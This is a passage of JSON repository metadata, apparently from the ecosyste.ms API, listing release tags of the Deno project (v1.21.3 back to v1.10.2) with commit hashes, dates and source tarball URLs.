/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1